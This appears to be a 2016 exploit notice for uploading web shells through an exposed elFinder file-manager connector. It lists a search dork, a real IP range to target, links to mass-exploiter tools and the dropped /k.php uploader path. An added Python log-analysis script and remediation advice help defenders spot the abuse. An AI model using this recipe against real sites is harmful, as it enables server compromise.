Elfinder Webhost Uploader vulnerability
<HTML><HEAD><TITLE>Elfinder Webhost Uploader vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|--------------------------------------------------------------|
|[>] Exploit Title: Elfinder Webhost Uploader vulnerability
|[>]
|[>] Exploit Author : CowoKerensTeam
|[>]
|[>] Dork : site:id.ai or IPgrabbing - Reverse IP
|[>]
|[>] Tested on: Windows 10
|[>]
|[>] Date: 25/11/2016
|[>]
|--------------------------------------------------------------|
|[>] Exploit : /_file-manager/php/connector.php
|--------------------------------------------------------------|
|[>]
|[>] Web based Single Exploiter : http://pastebin.com/EMviZw43
|[>] Web based Mass Exploiter : http://pastebin.com/wcpevk2w
|[>] Or Exploiter Online http://own.netau.net/
||--------------------------------------------------------------|
|[>]
|[>] IP Grab : 31.170.166.136 - 31.170.166.156
|[>] [136 or 156] can be changed according to the needs 1 to 300
|[>]
||--------------------------------------------------------------|
|[>]
|[>] www.target.com/_file-manager/php/connector.php
|[>]
|[>] Vuln : {"error":["errUnknownCmd"]}
|[>]
||--------------------------------------------------------------|
|[>]
|[>]
|[>] file uploader in : www.target.com/k.php
|[>]
|[>] Upload Ur Shell or Script Html
|[>]
||--------------------------------------------------------------|
|[>]
|[>]
|[>] DEMO :
|[>]
||--------------------------------------------------------------|
|[#]
|[#] CowoKerensTeam
|[#] Facebook.com/CowoKerensTeam
|[#]
|[#]
|[#] Greetz ~ Trenggalek 6etar
|[#]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
</BODY></HTML>
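For defenders reviewing their own web server logs, the two indicators the advisory names (the `/_file-manager/php/connector.php` connector and the `/k.php` uploader it leaves behind) can be correlated per client. This is an added example, not part of the original advisory; it assumes common/combined-format access logs, and the sample lines and IP addresses are constructed.

```python
import re
from collections import defaultdict

# Connector path and dropped-file name are the ones given in the advisory above.
CONNECTOR = "/_file-manager/php/connector.php"
DROPPED = "/k.php"

# Common/combined log format: ip - - [time] "METHOD path proto" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation-range IPs), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [25/Nov/2016:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.9 - - [25/Nov/2016:10:02:11 +0000] "GET /_file-manager/php/connector.php HTTP/1.1" 200 29
203.0.113.9 - - [25/Nov/2016:10:02:15 +0000] "POST /_file-manager/php/connector.php HTTP/1.1" 200 412
203.0.113.9 - - [25/Nov/2016:10:02:20 +0000] "GET /k.php HTTP/1.1" 200 731
198.51.100.7 - - [25/Nov/2016:10:03:00 +0000] "GET /k.php HTTP/1.1" 404 210
""".splitlines()


def find_connector_abuse(lines):
    """Return {ip: [(kind, timestamp)]} for clients that touched the connector;
    kind is 'probe' (non-POST), 'write' (POST) or 'dropped-file-hit'."""
    events = defaultdict(list)
    posted = set()  # clients whose POST to the connector returned 2xx
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, method = m["ip"], m["method"]
        path = m["path"].split("?", 1)[0].lower()  # ignore the query string
        ok = m["status"].startswith("2")
        if path.endswith(CONNECTOR):
            kind = "write" if method == "POST" else "probe"
            events[ip].append((kind, m["ts"]))
            if kind == "write" and ok:
                posted.add(ip)
        elif path.endswith(DROPPED) and ok and ip in posted:
            # 2xx on the uploader after this client's POST: treat as compromise
            events[ip].append(("dropped-file-hit", m["ts"]))
    return dict(events)


if __name__ == "__main__":
    for ip, evs in find_connector_abuse(SAMPLE_LOG).items():
        print(ip, evs)
```

Any `dropped-file-hit` means the file exists in the web root and was served; remove the `_file-manager` directory if it is not needed, or restrict it to authenticated users, and inspect the web root for files created around the `write` timestamp.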